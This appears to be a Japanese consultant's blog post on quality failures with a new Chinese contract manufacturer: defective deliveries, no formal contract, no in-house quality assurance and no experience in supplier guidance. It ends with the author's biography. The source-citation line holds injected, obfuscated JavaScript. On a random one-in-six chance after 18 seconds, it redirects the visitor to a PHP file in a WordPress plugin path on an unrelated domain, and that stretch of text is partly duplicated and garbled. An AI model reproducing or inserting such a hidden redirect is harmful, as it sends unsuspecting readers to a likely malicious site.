新たな中国仕入先との取引に関する問題!!

新たな中国仕入先との取引に関する問題!!

ある日本ベンチャー企業が
中国企業に自社開発商品の生産委託を始め、
その商品の販売が始まりました。
これまでも中国企業の商品は扱ってきましたが、
あくまでも代理店という立場でのものでした。

代理店から一歩進んで自社開発商品を販売することで会社を大きくしていく計画です。
生産委託先の中国企業(工場)は、
今までの取引で培った人脈で知り合った人から紹介してもらいました。

中国生産委託先でつくられた商品は、
サンプルを日本に送ってもらい品質を確認します。
OKであれば、量産開始です。
その後の品質管理は、工場側の管理に任せています。

案の定、不良品が納入されてきました。
売れ筋の商品で不良が多発していました。
中にはサンプル確認で不良を発見したので、
修正するように指示したにも関わらず
修正されずに納入されたものもありました。

この日本企業と中国企業の取引では品質だけではなく、
下記の問題点があることもわかりました。

1)正式な契約書を取交していない
知人からの紹介ということで、
信用して正式な契約書を取り交わしていなかったようです。
不良が出たときの処理や納期遅延の際の補償などが
何も決まっていませんでした。

2)自社で品質を保証するための仕組みが整備されていない
現状では、品質は中国生産委託先工場にすべて任せてしまっていて、自社で品質を保証するために何をやればよいのかが分かっていない。

3)中国企業との取引をするための考え方が不足している
例えば、こちら側の要求を相手に理解してもらうには
どうすればよいか。
日本企業相手と同じような感覚では無理であること。
これについては、その違いを感じているようでした。

4)品質改善指導が必要なことは理解しているが指導の経験がない
売れ筋商品に不良が多発している現状では、
いずれ大きな問題が起きる可能性があるので、
今のうちに品質改善指導してその芽を摘んでおくことが
必要ですが、指導の経験がない。

まだ取引を開始してそれほど時間が経っていない、
また、取引量も今後増やす予定ではあるものの、
現状さほど大きくない。
今のうちに前述の問題点を解消する手立てをすれば、
大きな問題になる前に解決することも可能です。

今後も中国企業と取引をする日本企業は多くなるでしょう。
致命的な問題が起きる前に、
問題を解決しておくことは必須です。

 

出典:$mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toimprove/entry-12289173115.html” target=”_blank”>新たな中国仕入先との取引に関する問題!!


KPIマネジメント代表・チーフコンサルタント◎電機系メーカーにて技術部門、資材部門を経て香港・中国に駐在。現地においては、購入部材の品質管理責任者として購入部材仕入先品質指導及び品質改善指導。延べ100社に及ぶ仕入先工場の品質改善指導に奔走 ◎東京都/千葉県商工会連合会専門エキスパート(品質管理、製造業指導) GCS認定コーチ◎日本生産性本部経営アカデミー講師 名古屋外国語大学非常勤講師 セミナー/企業研修講師多数◎中国工場コンサルティング実績 日系中国工場品質改善及び管理体制の見直し(広東省)、中国企業品質管理体制の構築(福建省1社)、中国企業労務人事管理監査対応指導(パートナーコンサルタントと共同で実施:広東省1社)、米国D社の労務人事監査指摘事項への対応を指導、中国工場品質管理体制の構築(広東、大連など2社)、中国工場運営管理支援(広東1社)、外観検査の精度向上指導(広東1社)、中国生産委託先工場監査代行(広東1社) 国内工場管理の見直し及び製品コストダウン、外灯製造会社の5S指導、金属加工会社の品質管理・改善、生産性向上指導(1社)、金属加工会社の組織再構築、経営改革指導(1社)、板金塗装会社の5S指導(1社)、環境関連企業の新工場立ち上げ支援(1社)◎製造業向け社員研修実績 中国人管理者教育(広東、大連、厦門など3社)、コーチング研修(2社)、来日した中国企業スタッフ研修、中国赴任前研修(パソナ様)、若手社員向け中国工場の問題点と対処法(和歌山県工業技術センター様)、中国工場品質管理講座&異文化コミュニケーション(富士通テレコムネットワークス様)、仕入先様品質管理勉強会 テーマ:中国工場での品質管理の進め方(株式会社オートバックスセブン様)、中国への生産委託に伴う工程/品質管理のポイント(N社様、I社様) ◎著書 こうすれば失敗しない!中国工場の品質改善<虎の巻>(日刊工業新聞社)、雑誌「標準化と品質管理」2012年8月号特集記事執筆(日本規格協会)、外観検査の不良見逃し・ばらつき低減(技術情報協会・共同執筆)、通信教育講座「外観目視検査の進め方と留意点」担当講師(テキスト執筆、添削指導) ◎KPIマネジメント http://www.prestoimprove.com/index.html ブログ「中国工場での品質管理・品質改善」https://ameblo.jp/prestoimprove/